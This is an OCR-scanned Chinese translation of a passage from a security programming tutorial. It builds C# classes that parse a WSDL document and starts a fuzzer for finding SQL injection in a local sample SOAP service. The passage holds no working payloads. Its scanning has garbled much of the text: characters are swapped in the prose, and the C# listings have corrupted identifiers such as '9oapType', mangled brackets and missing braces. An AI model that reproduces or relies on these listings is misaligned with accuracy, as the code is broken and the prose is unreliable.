档 作 为 参数 。 我 们 需要 做 的 第 一 件 事 是 在 实现 解析 方法 时 使 用 XPath 查询 (在 清单 3-3 之 后 介绍 ) 定义 我 们 将 引用 的 XML 命 名 空 
间 。 为 此 ， 我 们 创建 一 个 新 的 xmlNamespaceManager@ 并 使 用 AddNamespace () 方法 @ 添 加 两 个 命名 空间 wsdl 和 xs。 然 
后 ， 我 们 调用 将 解析 WSDL 文 档 的 元 素 的 方法 ， 从 类 型 开始 直到 服务 。 每 个 方法 都 有 两 个 参数 : WSDL 文 档 和 命名 空间 管理 器 。 


我 们 还 需要 访问 与 构造 函数 中 调用 的 方法 相对 应 的 WSDL 类 的 几 个 属性 。 将 清单 3-2 中 显示 的 属性 添加 到 WSDL 类 。 


清单 3-2: WSDL 类 的 公共 属性 


public 
public 
public 
public 
public 


List<9oapType> Types { get; set; } 
List<9oapMessage> Messages { get; set; } 
List<SoapPortType> PortTypes { get; set; } 
List<9oapBinding> Bindings { get; set; } 
List<SoapService> Services { get; set; } 


WSDL 类 的 这 些 属性 由 模糊 测试 工具 (这 就 是 为 什么 它们 是 公共 的 ) 以 及 在 构造 冰 数 中 调用 的 方法 所 使 用 。 属 性 是 本 章 将 要 
实现 的 SOAP 类 的 列表 。 


3.2.2 ”编写 初始 解析 方法 


乍 乞 ， 我 们 将 4 


员 写 清单 3-1 中 调用 的 方法 。 一 旦 实现 了 这 些 方 法 ， 我 们 将 继续 创建 每 个 方法 依赖 的 类 。 这 有 一 定 的 工作 量 ， 


但 我 们 将 一 起 完成 ! 


我 们 将 从 实现 清单 3-1 中 第 一 个 调用 的 方法 ParseTypes () 开始 。 从 构造 销 数 调用 的 所 有 万 法 都 比较 简单 ， 看 起 来 与 清单 3- 
3 相似 。 


清单 3-3: 在 WSDL 类 构造 图 数 中 调用 的 ParseTypes () 方法 


private void ParseTypes(XmlDocument wsdl, XmlNamespaceManager nsManager) 


{ 
this.Types = new List<9oapType>() ; 


string xpath = @ /wsdl:definitions/wsdl:types/xs:Sschema/xs:element 
XmlNodeList nodes = wsdl.DocumentElement.SelectNodes(xpath, nsManager); 
foreach (XmlNode type in nodes) 

this.Types.Add(new SoapType(type)); 


因为 这 些 方法 仪 企 WSDL 构 造 函 数 内 部 调用 ， 所 以 我 们 使 用 private 天 键 字 ， 以 便 只 有 WS3SDL 类 可 以 访问 它们 。 
ParseTypes () 方法 接受 WSDL 文 档 和 命名 空间 省 理 器 (用 于 解析 WSDL 文 档 中 的 命名 空间 ) 作为 参数 。 接 下 来 ， 实 例 化 一 个 亲 
的 List 对 象 并 为 其 分 配 Types 属 性 。 然 后 使 用 可 用 于 C# 中 的 XML 文 档 的 XPath 工 具 遍 历 WSDL 中 的 XML 元 泰 。XPath 人 允许 程序 员 
根据 文档 中 的 节点 路 人 径 遍 历 并 使 用 XML 文 档 。 在 此 示例 中 ， 我 们 通过 XPath 查 询 @ 的 SelectNodes () 方法 枚 举 文档 中 的 所 有 
SOAP type 节 点 。 然 后 ， 我 傍 代 这 些 SOAP 类 型 ， 并 将 每 个 节操 传递 给 SoapType 类 的 构造 冰 数 ， 这 是 在 输入 初始 解析 方法 后 
将 实现 的 类 之 一 。 最 后 ， 我 们 将 新 实例 化 的 SoapType 对 象 添加 到 WSDL 类 的 SoapType 列 表 属 性 。 


还 算 简 单 ， 对 吧 ? 我 们 将 采用 这 种 使 用 XPath 查 询 的 模式 来 多 次 遍历 特定 节点 以 使 用 WSDL 文 档 中 我 们 需要 的 其 他 几 种 类 型 
的 节点 。XPath 非 常 强大 并 且 非 常 适合 C# 语 言 


现在 我 们 将 实现 WsDL 构 造 亢 数 中 调用 的 解析 WSDL 文 档 的 下 一 个 万 法 ParseMessages () ， 如 清单 3-4 所 示 。 


清单 3-4: 在 WSDL 类 构造 国 数 中 调用 的 ParseMessages () 方法 


Ww 


private void ParseMessages(XmlDocument wsdl, XmlNamespaceManager nsManager) 


this.Messages = new List<9oapMessage>() ; 
string xpath = 四 /wsdl:definitions/wsdl:message ; 
XmlNodeList nodes = wsdl.DocumentElement.SelectNodes(xpath, nsManager); 
foreach (XmlNode node in nodes) 
this.Messages.Add(new SoapMessage(node)); 


首先 ， 需 要 实例 化 并 分 配 一 个 新 的 List 来 保存 SoapMessage 对 象 。 (SoapMessage 类 将 在 3.2.4 节 中 实现 。) 使 用 XPath 碍 
询 @ 从 WSDL 文 档 中 选择 消息 节点 ， 壕 代 SelectNodes () 方法 返回 的 节点 并 将 它们 传递 给 SoapMessage 构 造 冰 数 。 这 些 新 实 
例 化 的 对 象 被 添加 到 WSDL 类 的 Messages 属 性 中 以 备 随后 使 用 。 


从 WSDL 类 中 调用 的 接 下 来 的 几 个 方法 与 前 两 个 方法 类 似 。 到 现在 为 止 ， 考 虑 到 前 两 个 方法 的 原理 ， 对 你 来 说 它们 应 该 比较 
简单 了 。 这 些 方法 详 见 清单 3-5。 


清单 3-5: W3SDL 类 中 的 其 余 初 始 解析 方法 


private void ParsePortTypes(XmlDocument wsdl, XmlNamespaceManager nsManager) 
L 
this.PortTypes = new List<9oapPortType>() ; 
string xpath = “/wsdl:definitions/wsdl:portType'; 
XmlNodelList nodes = wsdl.DocumentElement.SelectNodes(xpath, nsManager); 
foreach (XmlNode node in nodes) 
this.PortTypes.Add(new SoapPortType(node)); 


} 


private void ParseBindings(XmlDocument wsdl, XmlNamespaceManager nsManager) 
{ 
this.Bindings = new List<SoapBinding>(); 
string xpath =“ /wsdl:definitions/wsdl:binding ; 
XmlNodeList nodes = wsdl.DocumentElement.SelectNodes(xpath, nsManager); 
foreach (XmlNode node in nodes ) 
this.Bindings.Add(new SoapBinding(node)); 


} 
private void ParseServices(XmlDocument wsdl, XmlNamespaceManager nsManager) 
{ 

this.Services = new List<SoapService>(); 

string xpath = "/wsdl:definitions/wsdl:service"; 


XmlNodelList nodes = wsdl.DocumentElement.SelectNodes(xpath, nsManager); 
foreach (XmlNode node in nodes) 
this.Services.Add(new SoapService(node)); 


要 使 用 PortTypes、Bindings 和 和 Services 属 性 ， 可 使 用 XPath 查 询 来 对 相关 节点 进行 遍历 和 和 迭代， 然后 实例 化 将 在 下 面 实现 
的 特定 SOAP 类 ， 并 将 它们 添加 a 到 列表 中 ， 以 便 稍 后 在 需要 构建 WSDL 模 糊 测 试 工具 的 逻辑 时 可 以 访问 它们 。 


这 丈 是 WSDL 类 。 一 个 构造 肖 数 ,一些 用 于 存储 与 WSDL 类 相关 的 数据 的 属性 ， 以 及 解析 WSDL 文 档 的 一 些 方 法 。 这 残 是 你 
开始 所 需 的 全 部 了 。 现 在 我 们 需要 实现 支持 类 。 在 解析 方法 中 ， 我 们 使 用 了 一 些 尚 未 实现 的 类 (如 SoapType、 
SoapMessage、Soap-PortType、SoapBinding 和 SoapService) 。 我 们 将 从 soapType 类 开始 。 


3.2.3 ”为 SODAP 类 型 和 参数 编写 一 个 类 


要 完成 ParseTypes () 方法 ， 我 们 需要 实现 SoapType 类 。SoapType 类 是 一 个 比较 简单 的 类 。 它 需要 的 是 一 个 构造 函数 和 
一 些 属性 ， 如 清单 3-6 所 示 。 


清单 3-6: 在 WSDL 模 糊 测试 工具 中 使 用 的 SoapType 类 


public class SoapType 


: 
public SoapType(XmlNode type) 


this.Name = type.@Attributes["name" | .Value; 
this.Parameters = new List<SoapTypeParameter>(); 

if (type.@HasChildNodes && type.FirstChild.HasChildNodes) 
{ 


foreach (XmlNode node in type.®@FirstChild.FirstChild.@ChildNodes) 
this.Parameters.Add(new SoapTypeParameter(node)); 


} 


public string Name { get; set; } 
public List<SoapTypeParameter> Parameters { get; set; } 


} 


SoapType 构 造 立 数 中 的 逻辑 类 似 于 之 前 的 解析 方法 (在 清单 3-40 清 单 3-5 中 ) ， 除 了 不 使 用 XPath 枚 举 达 代 的 节操 之 外 。 
我 想 展 示 另 一 种 迭代 XML 节 点 的 方式 。 通 常 ， 当 你 解析 XML 时 XPath 是 可 行 的 ， 但 是 XPath 的 计算 开销 会 比较 昂贵 。 在 这 种 情况 
下 ,我 们 将 编写 一 个 if 语 句 来 检查 是 否 必须 遍历 子 节点 。 使 用 foreach 循 环 迭 代 子 节点 寻找 相关 的 XML 元 素 比 在 该 特定 实例 中 使 
用 XPath 所 需 的 代码 略 少 。 


SoapType 类 有 两 个 属性 : 是 一 个 字符 串 的 Name 属 性 和 一 个 参数 列表 (SoapType-Parameter 类 ， 我 们 稍 后 将 实现 ) 。 这 
些 属 性 都 在 SoapType 构 造 函 数 中 使 用 ， 并 且 是 公共 的 ， 以 便 以 后 可 以 在 类 之 外 使 用 它们 。 


我 们 使 用 传递 给 构造 冰 数 参数 的 节点 上 的 Attributes 属 性 @ 来 检索 节点 的 Name 属 性 。name 属 性 的 值 分 配给 SoapType 类 的 
Name 属 性 。 我 们 还 实例 化 了 SoapTypeParameter 列 表 ， 并 将 新 对 象 分 配给 Parameters 属 性 。 因 为 没有 使 用 XPath 净 历任 何 子 
节点 ， 完 成 后 ， 使 用 if 语 句 来 确定 是 否 需 要 首先 遍历 子 节点 。 使 用 HasChildNodes 属 性 @ 会 返回 一 个 布尔 值 ， 以 便 确 定 是 否 必须 
遍历 子 节点 。 如 果 节 点 具有 子 节 点 ， 并 且 如 果 该 节点 的 第 一 个 子 节点 也 有 子 节 点 ， 我 们 将 对 它们 进行 秋 代 。 


每 个 XmlINode 类 都 有 一 个 FirstChild 属 性 和 一 个 ChildNodes 属 性 @， 它 返回 可 用 的 子 节点 的 枚 举 列表 。 在 foreach 循 环 中 ， 
我 们 使 用 一 系列 FirstChild 属 性 @) 来 遍历 传 入 的 节点 的 第 一 个 子 节点 的 第 一 个 子 节点 的 子 节点 。 


将 传递 给 SoapType 构 造 函 数 的 XML 节点 的 示例 如 清单 3-7 所 示 。 


在 亿 历 传 入 的 SoapType 节 点 中 的 相关 子 节 点 之 后 ， 通 过 将 当前 子 节 点 传递 到 SoapType-Parameter 构 造 潍 数 来 实例 化 一 个 
新 的 9oapTypeParameter 类 。 新 对 象 仓储 在 Parameters 列 表 中 供 以 后 访问 。 


清单 3-7: SoapType XML 示例 


<xs:element name= AddUseT > 
<xs:complexType> 
<xs:sequence> 
<xs:element minOccurs="0" maxOccurs="1" name="username" type= Xs:StTing /> 
<xs:element min0ccurs= 0 maxOccurs="1 name="password" type= xs:string'/> 
</xs:sequence> 
</xs:complexType> 
</xs:element> 


现在 我 们 来 创建 SoapTypeParameter 类 。SoapTypeParameter 类 也 比较 简单 。 实 际 上 ， 不 需要 对 子 节点 进行 迭代 ， 只 是 
进行 基本 的 信息 收集 ， 如 清单 3-8 所 示 。 


清单 3-8: SoapTypeParameter 类 


public class SoapTypeParameter 


{ 
public SoapTypeParameter(XmlNode node) 


@if (node.Attributes["maxOccurs"|.Value == "unbounded") 
this.MaximumOccurrence = int.MaxValue; 
else 
this.MaximumOccurrence = int.Parse(node.Attributes["maxOccurs" | .Value); 


this.MinimumOccurrence = int.Parse(node.Attributes["minOccurs" | .Value); 
this.Name = node.Attributes[ "name" | .Value; 
this.Type = node.Attributes[ "type" | .Value; 


} 


public int MinimumOccurrence { get; set; } 
public int MaximumOccurrence { get; set; } 
public string Name { get; set; } 
public string Type { get; set; } 


传递 给 SoapTypeParameter 构 造 闵 数 的 XML 节 点 的 示例 如 清单 3-9 所 示 。 


清单 3-9: 传递 给 SoapTypeParameter 构 造 肖 数 的 示例 XML 节 操 


<xs:element minOccurs="0" maxOccurs="1" name="UsSername”" type="xs:string'/> 


给 定 这 样 的 XML 节 点 ， 我 们 可 以 预期 在 方法 中 会 发 生 一 些 事情 。 首 先 ， 这 是 一 个 非常 基本 的 WSDL 参 数 ， 它 定义 了 一 个 名 为 
username 的 类 型 为 string 的 参数 。 它 最 少 可 以 友 生 零 次 ， 最 多 可 以 友 生 一 次 。 仔 细 看 看 清单 3-8 中 的 代码 ， 你 会 注意 到 有 一 个 if 
语句 @ 来 检查 maxOccurs 的 值 。 与 minOccurs 不 同 ，maxOccurs 可 以 是 整数 ， 也 可 以 是 无 边界 的 (unbounded) 字符 串 值 ， 
因此 我 们 在 将 其 传递 给 int.Parse () 方法 得 到 该 值 之 前 需要 检查 maxOccurs 的 值 。 


人 在 SoapTypeParameter 构 造 闵 数 中 ， 首 先 根 据 节 点 的 maxOccurs 属 性 来 分 配 Maximum-Occurrence 属 性 。 然 后 ， 根 据 相 
应 的 节点 属性 分 配 MinimumOccurrence、Name 和 Type 属性 。 


3.2.4 ”编号 一 个 SoapMessage 类 来 定义 友 这 的 数据 

SOAP 消 息 定义 了 Web 服 务 对 于 给 定 操作 所 期 望 或 响应 的 一 组 数据 。 它 引用 了 先前 解析 的 SOAP 类 型 和 参数 提供 的 数据 或 使 
用 客户 端 应 用 程序 中 的 数据 。 它 由 part (部 分 ) 组 成 ， 这 是 一 个 术语 。 清 单 3-10 提 供 了 SOAP 1.1 消 息 XML 元 素 的 示例 。 

清单 3-10: SOAP 消 息 XML 元 素 示例 


<message name="AddUserHttpGetIn"> 
<part name="username”" type= S:String /> 
<part name="password" type="s:string"/> 
</messagey> 


我 们 的 SoapMessage 类 使 用 类 似 清 单 3-10 中 的 XML 元 素 ， 如 清单 3-11 所 示 。 


清单 3-11: SoapMessage 类 


public class SoapMessage 


{ 
public SoapMessage(XmlNode node) 


{ 


this.Name = @node.Attributes|[ "name" | .Value; 
this.Parts = new List<SoapMessagePart>(); 
if (node.HasChildNodes) 


{ 
foreach (XmlNode part in node.ChildNodes) 


this.Parts.Add(new SoapMessagePart(part)); 


} 
} 
public string Name { get; set; } 
public List<SoapMessagePart> Parts { get; set; } 


} 


首先 ， 将 消息 的 名 称 分 配给 SoapMessage 类 的 Name 属 性 @@。 然 后 ， 实 例 化 一 个 新 的 名 为 SoapMessagePart 的 Parts 列 
表 ， 并 志 历 每 个 <part> 元 素 ， 将 元 素 传递 给 9oapMessage-Part 构 造 亢 数 ， 并 通过 将 其 添加 到 Parts 列 表 中 保 仓 新 的 
SoapMessagePart 供 以 后 使 用 。 


3.2.5 ”为 消 恩 部 分 实现 一 个 类 


像 之 前 已 经 实现 的 SOAP 类 一 样 ，SoapMessagePart 类 是 一 个 简单 的 类 ， 如 清单 3-12 所 示 。 
清单 3-12: SoapMessagePart 类 


public class SoapMessagePart 
{ 
public SoapMessagePart(XmlNode part) 


L 
this.Name = @part.Attributes["name" | .Value; 


if (@part.Attributes["element"] != null) 
this.Element = part.Attributes["element" |.Value; 
else if ( part.Attributes["type"].Value != null) 


this.Type = part.Attributes["type" | .Value; 
else 
throw new ArgumentException("Neither element nor type is set.", "part"); 


} 

public string Name { get; set; } 
public string Element { get; set; } 
public string Type { get; set; } 


SoapMessagePart 类 构造 函数 接受 单个 参数 XmlINode， 它 包含 SoapMessage 中 名 称 和 部 件 的 类 型 或 元 素 。 
SoapMessagePart 类 定义 了 三 个 公共 属性 : 部 件 的 Name、Type 和 Element， 它 们 都 是 字符 串 。 首 先 ， 将 部 件 的 名 称 人 存储 在 
Name 属 性 中 。 然 后 ， 如 果 有 一 个 名 为 element 的 属性 ， 我 们 将 element 属 性 的 值 赋 给 Element 属 性 @。 如 果 element 属 性 不 


存在 ， 则 type 属 性 必须 存在 ， 因 此 我 们 将 type 属 性 的 值 分 配给 Type 属性 。 对 于 任何 给 定 的 SOAP 部 件 只 设置 这 些 属性 中 的 两 个 
个 SOAP 部 件 始终 有 一 个 Name， 以 及 一 个 Type 或 Element。Type 或 Element 将 根据 该 部 件 是 简单 类 型 (如 字符 串 或 整 
数 ) 还 是 WSDL 中 另 一 个 XML 元 素 所 包含 的 复杂 类 型 进行 设置 。 必 须 为 每 种 类 型 的 参数 创建 一 个 类 ， 首 先 要 实现 Type 类 。 


3.2.6 ”使 用 SoapPortType 类 定义 端口 操作 


定义 了 SoapMessage 和 SoapMessagePart 类 完成 清单 3-4 中 的 ParseMessages () 方法 之 后 ， 我 们 继续 创建 
SoapPortType 类 ， 它 将 完成 ParsePortTypes () 方法 。SOAP 端 口 类 型 确定 给 定 端口 上 可 用 的 操作 (不 要 与 网 络 端口 混淆 ) 并 
且 解 析 它 ， 如 清单 3-13 所 示 。 


清单 3-13: ParsePortTypes () 方法 中 使 用 的 SoapPortType 类 


public class 9oapPortType 


L 
public SoapPortType(XmlNode node) 


{ 


this.Name = @node.Attributes["name" | .Value; 
this.Operations = new List<9oapOperation>() ; 
foreach (XmlNode op in node.ChildNodes) 
this.Operations.Add(new SoapOperation(op)); 
} 


public string Name { get; set; } 
public List<SoapOperation> Operations { get; set; } 
} 


继续 这 些 SOAP 类 工作 的 模式 : 清单 3-13 中 的 SoapPortType 类 定义 了 一 个 从 WSDL 文 档 接 受 XmlNode 的 小 构造 函数 。 它 需 
要 两 个 公共 属性 : 一 个 SoapOperation 列 表 和 一 个 Name 字 符 串 。 在 9oapPortType 构 造 亢 数 中 ， 我 们 将 Name 属 性 @ 分 配给 

XML name 属 性 。 然 后 ， 创 建 一 个 新 的 SoapOperation 列 表 ， 并 遍历 portType 元 素 中 的 每 个 子 节点 。 在 迭代 时 ， 将 子 节点 传递 
给 SoapOperation 构 造 函 数 (下 一 节 将 构建 ) ， 并 将 生成 的 goap-Operation 存 储 在 列表 中 。 在 清单 3-14 中 显示 了 将 传递 给 
SoapPortType 类 构造 函数 的 WSDL 文 档 中 的 XML 节点 示例 。 


清单 3-14: 将 PortType XML 节点 传递 给 SoapPortType 类 构造 函数 的 示例 


《portType name="VulnerableServiceSoap'> 
<operation name= AddUseTr > 
<input message= S0:AddUseTr9oapIn /> 
<output message= S0:AddUser9SoapOut /> 
</operation> 
<operation name= ListUseTSs > 
<input message= S0:ListUsers9oapIn /> 
<output message="s0:ListUsersSoapOut"/> 
</operation> 
<operation name= QetUser > 
<input message= sO0:GetUserSoapIn /> 
<output message= SO0:QetUser9oapOut /> 
</operation> 
<operation name="DeleteUser'"> 
<input message="s0:DeleteUserSoapIn"/> 
<output message="s0:DeleteUserSoapOut"/> 
</operation> 
</portType> 


可 以 看 到 ，portType 元 素 包含 我 们 可 以 执行 的 操作 ， 例 如 列 出 、 创 建 和 删除 用 户 。 每 个 操作 映射 为 在 清单 3-11 中 解析 的 给 


Pe I 
定 消息 。 


3.2.7 ”为 闹 口 操作 实现 一 个 类 


为 了 使 用 3oapPortType 类 构造 函数 的 操作 ， 需 要 创建 SoapOperation 类 ， 如 清单 3-15 所 示 。 
清单 3-15: SoapOperation 类 


public class SoapOperation 


{ 
public SoapOperation(XmlNode op) 


lL 
this.Name = @op.Attributes["name" | .Value ; 


foreach (XmlNode message in op.ChildNodes) 
{ 
if (message.Name.EndsWith("input")) 
this.Input = message.Attributes[ "message" | .Value; 
else if (message.Name.EndsWith("output")) 
this.Output = message.Attributes["message" ] .Value; 


} 
} 
public string Name { get; set; } 
public string Input { get; set; } 
public string Output { get; set; } 


SoapOperation 构 造 函 数 接受 一 个 上 mlNodef 人 作为 单个 参数 。 首 移 将 一 个 名 为 Name@ 的 SoapOperation 类 的 属性 分 配给 传 
递 给 构造 函数 的 操作 XML 元 素 的 name 属 性 。 然 后 ， 亡 历 每 个 子 节点 ， 检 查 元 素 的 名 称 是 以 “input” 还 是 “output” 结 束 。 如 
果子 节点 的 名 称 以 “input” 结 束 ， 则 将 Input 属 性 分 配给 输入 元 素 的 名 称 。 人 否则 ， 将 Output 属 性 分 配给 输出 元 素 的 名 称 。 现 在 
SoapOperation 类 已 经 实现 了 ， 我 们 可 以 转 到 完成 Parse-Bindings () 方法 所 需 的 类 。 


3.2.8 ”使 用 SOAP 绑 定 定义 协议 


绑 定 的 两 种 一 般 类 型 是 HTTP 和 SOAP。 这 似乎 是 多 余 的 ， 但 HTTP 绑 定 使 用 HTTP 查 询 字符 串 或 POST 参数 通过 HTTP 协 议 传 
输 数 据 。SOAP 绑 定 通过 简单 的 TCP 套 接 字 或 命名 管道 使 用 ?OAP 1.0 或 SOAP 1.1 协 议 ， 其 中 包含 XML 格式 的 从 服务 器 友 出 和 到 
服务 器 的 数据 。soapBinding 类 人 允许 你 决定 如 何 根据 绑 定 与 给 定 的 SOAP 端 口 进行 通信 。 


清单 3-16 中 显示 了 来 自 WsDL 的 示例 绑 定 节点 。 


清单 3-16: 来 自 WSDL 的 示例 绑 定 XML 节点 


<binding name="VulnerableServiceSoap” type="s0O:VulnerableServiceSoap"> 
<soap:binding transport="http://schemas.xmlsoap.org/soap/http" /> 
<operation name= AddUseT > 
<soap:operation soapAction= http://tempuri.org/AddUser style=" document /> 
<input> 
<soap:body use=" ]iteral /> 
</input> 
<output> 
<soap:body use=" 1iteral /> 
</output> 


</operation> 
</binding> 


为 了 解析 此 XML 书 点 ， 我 们 的 类 需要 从 绑 定 节操 中 提取 一 些 关 键 信息 ， 如 清单 3-17 所 示 。 


清单 3-17: SoapBinding 类 


public class SoapBinding 


人 
public SoapBinding(XmlNode node ) 


this.Name = @node.Attributes| "name" | .Value; 
this.Type = @node.Attributes["type" | .Value; 
this.IsHTTP = false; 

this.Operations = new List<SoapBindingOperation>(); 
foreach (XmlNode op in node.ChildNodes) 


{ 
if (@op.Name.EndsWith("operation")) 


{ 
this.Operations.Add(new SoapBindingOperation(op)); 


else if (op.Name == "http:binding") 


{ 
this.Verb = op.Attributes["verb" | .Value; 


this.IsHTTP = true; 


} 
} 

} 

public string Name { get; set; } 

public List<SoapBindingOperation> Operations { get; set; } 
public bool IsHTTP { get; set; } 

public string Verb { get; set; } 

public string Type { get; set; } 


在 接受 XmlINode 作 为 SoapBinding 构 造 疯 数 的 参数 后 ， 我 们 将 节点 的 name 和 type 属 性 的 值 分 配给 SoapBinding 类 的 
Name@ 和 Type@ 属 性 。 默 认 情 况 下 ， 将 布尔 类 型 的 IsSHTTP 属 性 设置 为 false。lsHTTP 属 性 可 帮助 我 们 确定 使 用 HTTP 人 参数 或 
SOAP XML 友 送 我 们 想 要 进行 模糊 测试 的 数据 。 


当 人 遍历 子 节点 时 ， 我 们 测试 每 个 子 节点 的 名 称 是 否 以 “operation”@ 结 尾 ， 如 果 是 ， 我 们 将 该 操作 添加 到 
SoapBindingOperation 列 表 中 。 如 果子 节点 的 名 称 不 以 “operation” 结 尾 ， 则 该 节点 应 该 是 HTTP 绑 定 。 我 们 使 用 else if 语句 
确认 这 种 情况 ， 并 将 HTTP Verb 属 性 设置 为 子 节点 的 verb 属 性 的 值 。 我 们 还 将 ISHTTP 设 置 为 true。Verb 属 性 应 该 包含 GET 或 
POST， 以 告诉 我 们 去 送 到 ?OAP 终 端的 数据 是 售 在 得 询 字 符 串 (GET) 参数 或 POST 参数 中 。 


接 下 来 ， 我 们 将 实现 SoapBindingOperation 类 。 


3.2.9 ”编辑 操作 子 节 点 的 列表 


SoapBindingOperation 类 是 SoapBinding 类 构造 浮 数 中 使 用 的 一 个 小 类 。 它 定义 了 一 些 基于 传递 给 构造 消 数 的 操作 书 点 赋 
值 的 字符 串 属 性 ， 如 清单 3-18 所 示 。 


清单 3-18: SoapBindingOperation 类 


public class SoapBindingOperation 


{ 
public SoapBindingOperation(XmlNode op) 


{ 
this.Name = @op.Attributes[ "name" | .Value; 
foreach (XmlNode node in op.ChildNodes) 


if (@node.Name == "http:operation") 
this.Location = node.Attributes["location" |.Value; 
else if (node.Name == "soap:operation" || node.Name == "soap12:operation") 
this.SoapAction = node.Attributes["soapAction" | .Value; 
} 


} 

public string Name { get; set; } 
public string Location { get; set; } 
public string SoapAction { get; set; } 


使 用 传递 给 构造 冰 数 的 XmlINode， 我 们 将 Name 属 性 @ 的 值 分 配给 XML 节 点 上 的 name 属 性 。 操 作 节 点 包含 几 个 子 节点 ， 
但 我 们 只 关心 三 个 特定 的 节操 : http:operation、soap: operation 和 soap12: operation。 当 疡 历 子 节点 以 查找 我 们 关心 的 节 
所 时 ， 我 们 检查 该 操作 是 HTTP 操 作 还 是 SOAP 操 作 。 如 果 是 HTTP 操 作 @， 则 存储 操作 的 终端 的 位 置 ， 它 是 一 个 如 /AddUser 的 
相对 URI。 如 果 是 SOAP 操 作 ， 那 么 存储 SoapAction， 它 在 针对 SOAP 终 映 进行 SOAP 调 用 时 在 特定 的 HTTP 头 中 使 用 。 当 编写 模 
糊 测试 的 逻辑 时 ， 该 信息 用 于 将 数据 友 送 到 正确 的 终端 。 


3.2.10 ”在 端口 上 寻找 SOAP 服 务 


在 开始 模糊 测试 之 前 ,我 们 需要 完成 WSDL 的 解析 。 我 们 将 实现 两 个 更 小 的 类 ， 包 括 可 用 的 SOAP 服 务 和 这 些 服务 上 的 
SOAP 端 口 。 必 须 先 实现 SoapService 类 ， 如 清单 3-19 所 示 。 


清单 3-19: SoapService 类 


public class SoapService 


{ 
public SoapService(XmlNode node) 


{ 
this.Name = @node.Attributes|[ "name" | .Value; 
this.Ports = new List<9oapPort>() ; 
foreach (XmlNode port in node.ChildNodes) 
this.Ports.Add(new SoapPort(port)); 
} 


public string Name { get; set; } 
public List<SoapPort> Ports { get; set; } 
} 


SoapService 类 使 用 XML 节 点 作为 构造 疯 数 的 唯一 参数 。 我 们 将 服务 的 名 称 分 配给 该 类 的 Name 属 性 @， 然 后 创建 一 个 名 为 
SoapPort 的 新 端口 列表 。 当 亿 历 服务 节点 中 的 子 节点 上 时， 我们 使 用 每 个 子 节点 创建 一 个 新 的 SoapPort， 并 将 新 对 象 添加 到 
SoapPort 列 表 中 供 以 后 使 用 。 


WSDL 广 档 中 具有 四 个 子 端 口 节点 的 示例 服务 XML 市 点 如 清单 3-20 所 示 。 


清单 3-20: WSDL 文 档 中 的 示例 服务 节 点 


<service name="VulnerableService'> 
<port name="VulnerableServiceSoap”" binding="s0:VulnerableServiceSoap"> 
《Soap:address location= "http://127.0.0.1:8080/Vulnerable.asmx /> 
</port> 
<port name="VulnerableServiceSoap12" binding="s0O:VulnerableServiceSoap12"> 
《Soap12:address location="http://127.0.0.1:8080/Vulnerable.asmx /> 
</port> 
<port name="VulnerableServiceHttpGet" binding="s0O:VulnerableServiceHttpGet"> 
<http:address location="http://127.0.0.1:8080/Vulnerable.asmx' /> 
</port> 
<port name="VulnerableServiceHttpPost" binding= sO:VulnerableServiceHttpPost"> 
<http:address location="http://127.0.0.1:8080/Vulnerable.asmx' /> 
</port> 
</Service> 


最 后 要 做 的 是 实现 SoapPort 类 来 完成 ParseServices () 方法 ， 然 后 结束 WSDL 的 解析 以 进行 模糊 测试 。SoapPort 类 如 清单 
3-21 所 示 。 


清单 3-21: SoapPort 类 


public class SoapPort 


public SoapPort(XmlNode port) 


this.Name = @port.Attributes["name" ] .Value; 

this.Binding = port.Attributes["binding" | .Value; 
this.ElementType = port.@FirstChild.Name; 

this.Location = port.FirstChild.Attributes["location" |] .Value; 


} 

public string Name { get; set; } 

public string Binding { get; set; } 
public string ElementType { get; set; } 
public string Location { get; set; } 


要 完成 WSDL 文 档 的 解析 ， 我 们 从 传递 给 SoapPort 构 造 肖 数 的 端口 节点 中 获取 一 些 属性 。 首 先 在 Name 属 性 @ 中 存储 并 口 
的 名 称 ， 并 在 Binding 属 性 中 存储 绑 定 。 然 后 ， 使 用 FirstChild 属 性 @ 引 用 端口 节点 唯一 的 子 节点 ， 分 别 将 子 节 点 的 名 称 和 位 置 
数据 存储 在 ElementType 和 Location 属 性 中 。 


最 后 ， 将 WSDL 广 档 分 解 为 可 管理 的 部 分 ， 这 使 我 们 能 够 轻松 地 编写 一 个 模糊 测试 工具 来 寻找 潜在 的 SQL 注 入 。 将 WSDL 的 
各 个 部 分 描述 为 类 ， 我 们 可 以 编程 目 动 化 漏洞 检测 并 报告 。 


3.3” 目 动 化 执行 模糊 测试 


现在 构建 WSDL 模 糊 测 试 工具 的 各 个 部 分 已 经 完成 ， 我 们 可 以 开始 开 友 一 些 真 正 有 趣 的 东西 了 。 使 用 WSDL 类 ， 我 们 可 以 以 
面向 对 象 的 方式 与 WSDL 中 的 数据 进行 交互 ， 这 使 得 对 SOAP 终 端 进行 模糊 测试 变 得 更 加 容易 。 首 先 编写 一 个 新 的 Main () 方 
法 ， 它 接受 一 个 参数 (SOAP 终 端的 URL) ， 它 可 以 在 目 己 的 Fuzzer 类 中 的 目 己 的 文件 中 创建 ， 如 清单 3-22 所 示 。 


清单 3-22: SOAP 终 端 模糊 测试 工具 的 Main () 方法 


private static ©@WSDL wsdl = null; 
private static @string endpoint = null; 
public static void Main(string[] args) 


{ 
_endpoint = 四 args[0|; 
Console.WriteLine("Fetching the WSDL for service: " + endpoint); 


HttpWebRequest req = (HttpWebRequest)WebRequest.Create( endpoint + "?WSDL"); 

XmlDocument wsdlDoc = new XmlDocument(); 

using (WebResponse resp = req.GetResponse()) 

using (Stream respStream = resp.GetResponseStream()) 
wsdlDoc.@Load(respStream); 


‘wsdl] = new WSDL(wsdlDoc); 
Console.WriteLine("Fetched and loaded the web service description."); 


foreach (SoapService service in wsdl.Services) 
FuzzService(service); 


首先 在 类 中 的 Main () 方法 之 前 声明 一 些 静 态 变 量 。 这 些 变量 将 在 我 们 编写 的 方法 中 使 用 。 第 一 个 变量 是 WSDL 类 Q@3,， 第 
二 个 变量 将 URL 存 储 到 SOAP 终 端 @。 


在 Main () 方法 中 ， 我 们 将 endpoint 变 量 分 配 为 传递 给 模糊 测试 工具 @) 的 第 一 个 参数 的 值 。 然 后 ， 打 印 一 条 消息 提醒 用 
户 我 们 要 为 SOAP 服 务 获 取 WSDL。 


在 将 URL 存 储 到 终端 后 ， 创 建 一 个 新 的 HttpWebRequest， 通 过 将 WSDL 添 加 到 终端 URL 的 最 后 来 人 人 SOAP 服务 中 检索 
WSDL。 我 们 还 创建 了 一 个 临时 XmlDocument 来 存储 WSDL 并 传递 给 WSDL 类 构造 水 数 。 通 过 将 HTTP 响 应 流传 递 给 
